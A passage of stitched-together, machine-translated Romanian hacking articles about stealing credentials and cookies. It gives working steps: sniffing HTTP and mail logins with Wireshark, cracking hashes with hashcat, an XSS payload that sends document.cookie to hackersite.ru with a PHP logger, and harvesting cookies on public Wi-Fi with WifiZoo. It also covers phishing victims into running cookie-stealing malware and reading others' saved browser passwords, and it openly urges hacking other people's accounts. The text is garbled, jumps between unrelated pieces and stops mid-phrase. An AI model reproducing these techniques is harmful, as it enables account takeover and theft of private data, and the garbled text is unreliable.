Mulți utilizatori nu realizează că completând un login și o parolă atunci când se înregistrează sau se autorizează pe o resursă de Internet închisă și apăsând ENTER, aceste date pot fi ușor interceptate. Foarte des sunt transmise prin rețea într-o formă nesecurizată. Prin urmare, dacă site-ul la care încercați să vă conectați folosește protocolul HTTP, atunci este foarte ușor să captați acest trafic și să îl analizați cu folosind Wireshark apoi, folosind filtre și programe speciale, găsiți și decriptați parola.

Cel mai bun loc pentru a intercepta parolele este nucleul rețelei, unde traficul tuturor utilizatorilor merge către resurse închise (de exemplu, mail) sau în fața routerului pentru a accesa Internetul, la înregistrarea pe resurse externe. Am instalat o oglindă și suntem gata să ne simțim ca un hacker.

Pasul 1. Instalați și lansați Wireshark pentru a capta traficul

Uneori, pentru a face acest lucru, este suficient să selectăm doar interfața prin care intenționăm să captăm trafic și să facem clic pe butonul Start. În cazul nostru, facem captură printr-o rețea fără fir.

Captarea traficului a început.

Pasul 2. Filtrarea traficului POST capturat

Deschidem browserul și încercăm să ne conectăm la o resursă folosind un nume de utilizator și o parolă. Odată ce procesul de autorizare este încheiat și site-ul este deschis, nu mai captăm trafic în Wireshark. Apoi, deschideți analizorul de protocol și vedeți un număr mare de pachete. În acest moment, majoritatea profesioniștilor IT renunță pentru că nu știu ce să facă în continuare. Dar cunoaștem și suntem interesați de pachetele specifice care conțin date POST, care sunt generate pe mașina noastră locală la completarea unui formular pe ecran și trimise către server la distanță când faceți clic pe butonul „Autentificare” sau „Autorizare” din browser.

Introducem un filtru special în fereastră pentru a afișa pachetele capturate: http.cerere.metoda == “POST"

Și vedem, în loc de mii de pachete, doar unul cu datele pe care le căutăm.

Pasul 3. Găsiți numele și parola utilizatorului

Faceți rapid clic dreapta și selectați elementul din meniu Urmărește TCP Steam

După aceasta, textul va apărea într-o nouă fereastră care restabilește conținutul paginii în cod. Să găsim câmpurile „parolă” și „utilizator”, care corespund parolei și numelui de utilizator. În unele cazuri, ambele câmpuri vor fi ușor de citit și nici măcar criptate, dar dacă încercăm să captăm trafic atunci când accesăm resurse foarte cunoscute precum Mail.ru, Facebook, Vkontakte etc., atunci parola va fi criptată:

HTTP/1.1 302 găsit

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRO STP IND DEM"

Set-Cookie: parola= ; expiră=Joi, 07-Nov-2024 23:52:21 GMT; cale=/

Locație: loggedin.php

Lungimea conținutului: 0

Conexiune: aproape

Tip de conținut: text/html; set de caractere=UTF-8

Astfel, in cazul nostru:

Nume de utilizator: networkguru

Parolă:

Pasul 4. Determinați tipul de codificare pentru a decripta parola

De exemplu, accesați site-ul web http://www.onlinehashcrack.com/hash-identification.php#res și introduceți parola noastră în fereastra de identificare. Mi s-a dat o listă de protocoale de codificare în ordinea priorității:

Pasul 5. Decriptarea parolei utilizatorului

Pe în această etapă putem folosi utilitarul hashcat:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

La ieșire am primit o parolă decriptată: simplepassword

Astfel, cu ajutorul Wireshark nu putem doar să rezolvăm problemele de funcționare a aplicațiilor și serviciilor, ci și să ne încercăm ca un hacker, interceptând parolele pe care utilizatorii le introduc în formularele web. De asemenea, puteți afla parolele pentru căsuțele poștale ale utilizatorilor folosind filtre simple pentru afișare:

• Protocolul POP și filtrul arată astfel: pop.request.command == „USER” || pop.request.command == „PASS”
• Protocolul și filtrul IMAP vor fi: imap.request conține „login”
• Protocolul SMTPși va trebui să introduceți următorul filtru: smtp.req.command == „AUTH”

și utilități mai serioase pentru decriptarea protocolului de codare.

Pasul 6: Ce se întâmplă dacă traficul este criptat și folosește HTTPS?

Există mai multe opțiuni pentru a răspunde la această întrebare.

Opțiunea 1. Conectați-vă când conexiunea dintre utilizator și server este întreruptă și captați traficul în momentul în care se stabilește conexiunea (SSL Handshake). Când se stabilește o conexiune, cheia de sesiune poate fi interceptată.

Opțiunea 2: puteți decripta traficul HTTPS folosind fișierul jurnal cu cheia de sesiune înregistrat de Firefox sau Chrome. Pentru a face acest lucru, browserul trebuie configurat să scrie aceste chei de criptare într-un fișier jurnal (exemplu bazat pe FireFox) și ar trebui să primiți acel fișier jurnal. În esență, trebuie să furați fișierul cheie de sesiune din hard disk alt utilizator (ceea ce este ilegal). Ei bine, atunci captează traficul și folosește cheia rezultată pentru a-l decripta.

Clarificare. Vorbim despre browserul web al unei persoane a cărei parolă încearcă să o fure. Dacă ne referim la decriptarea propriului trafic HTTPS și dorim să exersăm, atunci această strategie va funcționa. Dacă încercați să decriptați traficul HTTPS al altor utilizatori fără acces la computerele lor, acest lucru nu va funcționa - adică atât criptare, cât și confidențialitate.

După ce primiți cheile conform opțiunii 1 sau 2, trebuie să le înregistrați în WireShark:

1. Accesați meniul Editare - Preferințe - Protocoale - SSL.
2. Setați indicatorul „Reasamblați înregistrările SSL care acoperă mai multe segmente TCP”.
3. „Lista de chei RSA” și faceți clic pe Editare.
4. Introduceți datele în toate câmpurile și scrieți calea în fișier cu cheia

„Un smartphone cu instrumente de hacking? Nu există așa ceva”, v-am fi spus recent. A fost posibilă lansarea unora dintre instrumentele obișnuite pentru implementarea atacurilor doar asupra unor Maemo. Acum, multe instrumente familiare au fost portate pe iOS și Android, iar unele instrumente de hack-uri au fost special scrise pentru mediul mobil. Poate un smartphone să înlocuiască un laptop în testele de penetrare? Am decis să verificăm.

ANDROID

Manager de pachete

Scanere de rețea

Manipularea traficului

Tunnel de trafic

Rețele fără fir

Auditul aplicației web

Diverse utilitati

Acces de la distanță

iOS

Lucrul cu sistemul

Interceptarea datelor

Analiza rețelei fără fir

Scanere de rețea

Telecomanda

Recuperarea parolei

Exploatarea vulnerabilităților

Ce este un cookie?

Există un mecanism care permite serverului http să salveze unele informații text pe computerul utilizatorului și apoi să le acceseze. Aceste informații numit cookie. În esență, fiecare cookie este o pereche: numele unui parametru și valoarea acestuia. Fiecărui cookie i se atribuie, de asemenea, domeniul căruia îi aparține. Din motive de securitate, în toate browserele serverului http îi este permis doar să acceseze cookie-ul domeniului său. În plus, cookie-urile pot avea o dată de expirare, caz în care vor fi stocate pe computer până la această dată, chiar dacă închideți toate ferestrele browserului.

Toate sistemele multi-utilizator folosesc cookie-uri pentru a identifica utilizatorul. Mai precis, conexiunea curentă a utilizatorului la serviciu, sesiune utilizator. Dacă cineva vă recunoaște cookie-urile, se va putea conecta în sistem în numele dvs. Pentru că în momentul prezent foarte puține resurse de Internet verifică modificările adresei IP în timpul unei sesiuni de utilizator.

Dezvoltatorii de browser nu oferă instrumente încorporate pentru editarea cookie-urilor. Dar te poți descurca cu un blocnotes obișnuit.

Windows Registry Editor versiunea 5.00



@="C:\\IE_ext.htm"

Salvați-l sub numele IE_ext.reg

Pasul 2: Folosind fișierul creat, adăugați modificări la registrul Windows.

Pasul 3: creați un fișier text cu text

< script language="javascript">
external.menuArguments.clipboardData.setData(„Text” , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);

Pasul 4: Mergem pe site-ul web care ne interesează.

Pasul 5: Faceți clic dreapta pe un spațiu gol din pagină și selectați elementul de meniu „Lucrul cu cookie-uri”. Permite accesul la clipboard. Dvs cookie de asta site-ul web. Puteți să le introduceți blocnotesul și să aruncați o privire.

Pasul 6: Pentru a schimba unele cookie-uri, editați fișierul C:\IE_ext.htm, înlocuind testnameîn numele cookie-ului, valoare de test- asupra semnificației sale, testdomain.ru– la domeniul site-ului. Dacă este necesar, adăugați mai multe linii similare. Pentru a ușura controlul, am adăugat la script rezultatul cookie-urilor curente înainte și după modificare: alert(external.menuArguments.document.cookie);

Pasul 7: Efectuați din nou Pasul 5, apoi reîmprospătați pagina.

Concluzie: vom accesa această resursă de internet cu cookie-uri actualizate.

Cum să furi cookie-uri folosind JavaScript?

Dacă un atacator reușește să găsească o oportunitate de a executa un script JavaScript arbitrar pe computerul victimei, atunci poate citi cookie-urile curente foarte ușor. Exemplu:

var str= document.cookie;

Dar va putea să le transfere pe site-ul său, deoarece, așa cum am subliniat mai devreme, un script JavaScript nu va putea accesa un site situat pe un alt domeniu fără o confirmare suplimentară? Se pare că un script JavaScript poate încărca orice imagine aflată pe orice server http. În același timp, transferați orice informație text din solicitarea de descărcare către această imagine. Exemplu: http://hackersite.ru/xss.jpg?text_info Deci, dacă rulați acest cod:

var img= imagine nouă();

img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(document.cookie);

Cum să gestionați astfel de solicitări de descărcare a unei „imagine”?

Un atacator trebuie doar să găsească o găzduire cu suport PHP și să plaseze acolo cod ca acesta:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Apoi toți parametrii de solicitare pentru acest script vor fi salvați în fișier log.txt. Tot ce rămâne este să înlocuim scriptul JavaScript descris anterior http://hackersite.ru/xss.jpg la calea către acest script php.

Am arătat doar cel mai simplu mod de a exploata vulnerabilitățile XSS. Dar acest lucru demonstrează că prezența a cel puțin unei astfel de vulnerabilități pe un site de internet multi-utilizator poate permite unui atacator să-și folosească resursele în numele tău.

Bună, acest articol scurt, mai degrabă chiar scurtă descriere Aș vrea să mă dedic mod simplu interceptați cookie-urile în rețele wi-fi. Nu vă voi spune aici ce sunt cookie-urile și de ce sunt necesare, dacă o persoană este interesată să intercepteze „produse de panificație”; într-o rețea fără fir, cred că ar trebui să știe ce este și de ce are nevoie. Voi spune doar un lucru: folosind aceste fișiere puteți obține acces la conturile altor persoane de pe diferite site-uri care necesită ca utilizatorii să treacă printr-un proces de autentificare (De exemplu, mail.ru, vkontakte.ru etc.).

Deci, să începem. În primul rând, trebuie să găsim rețeaua wireless în sine, cu un gateway de acces la Internet deschis și este de dorit ca această rețea să aibă destul de mulți clienți. De exemplu, orice rețea din marile centre comerciale, aeroporturi, diverse cafenele este potrivită în astfel de locuri pe care oamenii le folosesc de obicei acces wi-fi pe Internet, pentru citirea e-mailurilor, verificarea conturilor pe diverse site-uri de întâlniri, vizualizarea LJ și diverse forumuri. Totul este exact ceea ce avem nevoie. După ce am decis asupra alegerii locației rețelei, după ce am studiat anumite ore ale numărului maxim de clienți, să trecem direct la operațiunile de luptă. Pentru asta avem nevoie de un laptop cu adaptor wi-fi, și un anumit set de programe. In cazul meu, am folosit laptop Acer Aspire 3610, card wi-fi client D-Link DWL G650 și sistemul de operare BackTrack3 instalat.

Vă sfătuiesc să utilizați acest sistem de operare, deoarece include deja întregul set de programe de care ați putea avea nevoie, iar cel mai important avantaj este că nu trebuie să instalați Backtrack pe dvs. hard disk, puteți porni acest sistem de operare direct de pe un CD sau o unitate flash.

Acum să trecem la software-ul necesar. Am folosit kismet pentru descoperirea rețelei și WifiZoo pentru interceptarea cookie-urilor. Mă voi opri în detaliu asupra celui de-al doilea program. WifiZoo este un scaner pasiv de unde radio și colectează destul de multe informatii utile, cum ar fi: pop3, trafic smtp, cookie http/authinfo, msn, acreditări ftp, trafic de rețea telnet, nbt etc. Singurul dezavantaj al acestui program este lipsa modului Channel Hopping, WifiZoo doar ascultă interfață fără fir, și nu pot, ca să spunem așa, să sară de la un canal la altul. Dar acest dezavantaj este compensat de un alt program, Kismet, care acceptă acest mod. Pentru a porni WifiZoo veți avea nevoie de:

• piton
• scapy
• Kismet

Deci, să lansăm programul, mai întâi să lansăm Kismet pentru a susține modul de salt al canalului, apoi lansăm direct WifiZoo, următoarea fereastră ar trebui să apară în fața ta:

Acum rămâne doar să stai și să aștepți până interceptezi ceva tot ce interceptează programul poate fi găsit în jurnalele, care se află în directorul cu programul /logs/. De asemenea, puteți lansa o interfață GUI care se conectează automat la http la 127.0.0.1:8000

Nu voi scrie despre toate caracteristicile acestui program minunat, cred că vă veți da seama de celelalte caracteristici și, pentru că momentan, ne interesează doar cookie-uri. Faceți clic pe linkul care spune cookie-uri și vedeți ce am interceptat:

Modalități de a fura biscuiți

Această metodă de hacking, furtul cookie-urilor, funcționează excelent și este folosită de mulți hackeri. Dacă vrei să-l încerci și tu, dar nu știi ce să faci, citește recomandările noastre.

Ce sunt cookie-urile?

Acestea sunt informații despre vizita unui utilizator pe un anumit site. Este depozitat într-un loc separat document text. Acolo puteți găsi o varietate de informații. Inclusiv date de conectare, parole, adrese cutiile poştale si numere de telefon. De aceea, spărgătorii se străduiesc să pună mâna pe aceste documente. Pentru a fura materialele de care au nevoie, hackerii recurg la diferite metode.

Modalități de a fura biscuiți

Vulnerabilitatea XSS

Poate fi găsit și folosit pe orice site web. Când un specialist găsește o vulnerabilitate, o implementează cod special. În funcție de scop, codurile sunt diferite, sunt scrise pentru o anumită resursă. Când un utilizator vizitează această pagină și o reîmprospătează, toate modificările sunt aplicate. Codul începe să acționeze - este încorporat în computerul victimei și colectează totul informatiile necesare din browser.

Pentru a introduce cod, puteți folosi orice tip de vulnerabilitate - o eroare într-o resursă web, într-un browser sau într-un sistem informatic.

Există 2 tipuri de atacuri XSS:

Pasiv - direcționat către scriptul paginii. În acest caz, trebuie să căutați vulnerabilități în elementele paginii. De exemplu, o filă de dialog, o casetă de căutare, un catalog video etc.

Activ - ar trebui să le cauți pe server. Sunt frecvente în special pe diverse forumuri, bloguri și chat-uri.

Cum să forțezi o persoană să aplice XSS?

Sarcina nu este ușoară, deoarece adesea pentru a activa codul trebuie să faceți clic pe linkul cu acesta. Puteți ascunde linkul și îl puteți trimite într-un e-mail împreună cu o ofertă interesantă. De exemplu, oferă o reducere mare într-un magazin online. De asemenea, puteți implementa toate acestea în imagine. Cel mai probabil, utilizatorul îl va vedea și nu va bănui nimic.

Instalarea unui sniffer

Aceasta este o implementare programe specializate pentru a monitoriza traficul pe dispozitivul altcuiva. Sniffer-ul vă permite să interceptați sesiunile transmise cu datele altor persoane. În acest fel, puteți obține toate datele de conectare și parolele, adresele, orice informatii importante transmis prin rețea de către utilizator. În acest caz, atacurile sunt cel mai adesea efectuate asupra datelor HTTP neprotejate. Wi-Fi nesecurizat funcționează bine pentru asta.

Există mai multe moduri de a implementa un sniffer:

• Copierea traficului;
• Analiza datelor folosind atacuri de trafic;
• Ascultarea interfețelor;
• Introducerea unui sniffer într-o pauză de canal.

Furtul cookie-urilor folosind un virus

Experții sfătuiesc să nu folosiți cookie-uri decât dacă există o nevoie specială pentru el. Dacă este posibil să le dezactivați, este mai bine să faceți acest lucru. Acest lucru se datorează faptului că cookie-urile sunt foarte vulnerabile. Ele sunt adesea furate de criminali. O cantitate imensă de informații personale poate fi obținută din aceste fișiere. informații confidențiale, care va fi folosit împotriva unei persoane. Cel mai periculos tip de fișiere sunt cele care rămân în sistem după ce sesiunea sa încheiat deja.

Cookie-urile sunt adesea furate folosind un utilitar antivirus. Acest lucru se face destul de simplu. Orice utilitar sigur este încorporat cu un virus care colectează anumite materiale de pe computer. Programul virus va fi conectat la serverul proprietarului său. Programul trebuie configurat astfel încât browserul să-l folosească ca server proxy.

Când programul ajunge pe PC-ul victimei, va începe automat să colecteze toate datele stocate și să vi le trimită.

Virușii sunt diferiți, funcțiile lor pot diferi și ele. Unele vă permit să controlați complet browserul și să vizualizați orice informație. Alții sunt capabili să fure materiale protejate. Alții colectează doar date nesecurizate.

Este posibil să aveți dificultăți la introducerea unui program de virus pe computerul altcuiva. Este necesar să forțați utilizatorul să îl descarce și să îl ruleze. Aici puteți fie să îi trimiteți o scrisoare cu un link către program, fie să treceți programul drept sigur și să așteptați ca persoana respectivă să îl descarce de pe site-ul dvs. web.

Cum să protejăm cookie-urile de furt?

Majoritatea resurselor web nu sunt suficient de protejate. Hackerii găsesc cu ușurință vulnerabilități și erori în aceste platforme.

Reguli de protecție a cookie-urilor:

1. Conectați ID-ul computerului la sesiunea curentă. Apoi, când vă conectați pe site de pe un dispozitiv terță parte, va fi pornită o nouă sesiune, iar datele de la cea anterioară nu vor fi preluate.
2. Conectați sesiunea la browser. Același principiu va funcționa ca și în paragraful anterior.
3. Criptați parametrii trimiși prin rețea. Atunci informațiile stocate în document nu vor fi de înțeles. Va fi inutil celui care l-a interceptat. Această tehnică nu vă va proteja 100% unii specialiști pot decripta orice materiale.
4. Creați un folder separat pentru identificatori.

Cum să aflați parola pentru contul altcuiva prin cookie-uri?

Pentru a obține datele de conectare ale altcuiva, trebuie mai întâi să ajungeți la fișierul în care a fost salvat.

Pentru cei care folosesc Mozilla Firefox trebuie să accesați fila instrumente, care se află în meniul principal. În continuare, în setările sistemului veți găsi secțiunea „Protecție”, unde ar trebui să căutați toate informațiile importante despre conturile de pe rețelele sociale. Toate parolele sunt ascunse, așa că faceți clic pe butonul „afișare”. Puteți instala imediat protecția și puneți un cod special. Atunci nimeni în afară de tine nu va primi aceste informații.

În Opera, numai numele de utilizator sunt disponibile pentru vizionare publică. Dar în meniu puteți găsi un manager de parole și puteți vedea tot ce este stocat pe computer. Lista completă este în manager. Pentru a obține acces la parole, trebuie să instalați o extensie suplimentară.

ÎN Google Chrome Toate aceste materiale pot fi văzute în setările avansate. Există o filă cu toate cookie-urile salvate.

Din păcate, browser standard Internet Explorer nu are astfel de functii. Pentru a afla informații despre platformele web pe care le vizitează proprietarul PC-ului, trebuie să descărcați un program special. Îl puteți găsi pe Internet gratuit, este complet sigur, dar este mai bine să îl descărcați din surse de încredere. Nu uitați că orice program trebuie scanat de un antivirus. Acest lucru este valabil mai ales pentru acele utilitare care funcționează cu parole.

Această tehnică este potrivită numai pentru cei care au acces fizic la computerul victimei. De asemenea, puteți afla parola altcuiva dacă persoana sa conectat la platformă prin intermediul computerului dvs. și și-a salvat datele.

Programe pentru furtul cookie-urilor

Există multe forumuri de hackeri pe Internet în care hackerii comunică între ei. Oamenii merg acolo sperând să primească ajutor gratuit. Acolo puteți găsi un număr mare de programe diferite pentru hacking. Dorim să vă avertizăm că nu trebuie să aveți încredere în aceste programe. Utilitățile pentru furtul de la distanță cookie-uri de pe dispozitivul altcuiva sunt manechine sau programe viruși. Dacă descărcați acest software pe computer, cel mai probabil veți cădea în capcana unui escroc. Escrocii postează programe gratuit. Astfel, ei distribuie software viruși și câștigă controlul asupra computerelor altor persoane. În general, astfel de programe sunt o înșelătorie, veți înțelege acest lucru după interfața și conținutul lor. Dacă aveți de gând să utilizați orice software pentru a extrage fișiere, atunci lăsați-l să fie sniffers. Desigur, folosirea lor nu este atât de ușoară. Și să găsești un bun sniffer pe Internet nu este ușor. Dar un astfel de software este disponibil de la specialiști care ți-l pot vinde pentru bani. Amintiți-vă că există mulți escroci, fiecare cu trucurile lui. Ar trebui să aveți încredere doar în hackeri de încredere care au o bună reputație, au recenzii și au propriul lor site web.

În concluzie, aș dori să observ că furtul cookie-urilor este o metodă cu adevărat puternică, a cărei eficacitate este foarte mare. Dacă doriți să spargeți profilul cuiva pe o rețea de socializare sau mesagerie instant, asigurați-vă că luați în considerare această opțiune. Această metodă funcționează cel mai bine atunci când puteți utiliza computerul victimei. Este mult mai dificil să obții materiale de la distanță, dar poți folosi sfaturile noastre și poți încerca să pui în practică această metodă.

In sectiunea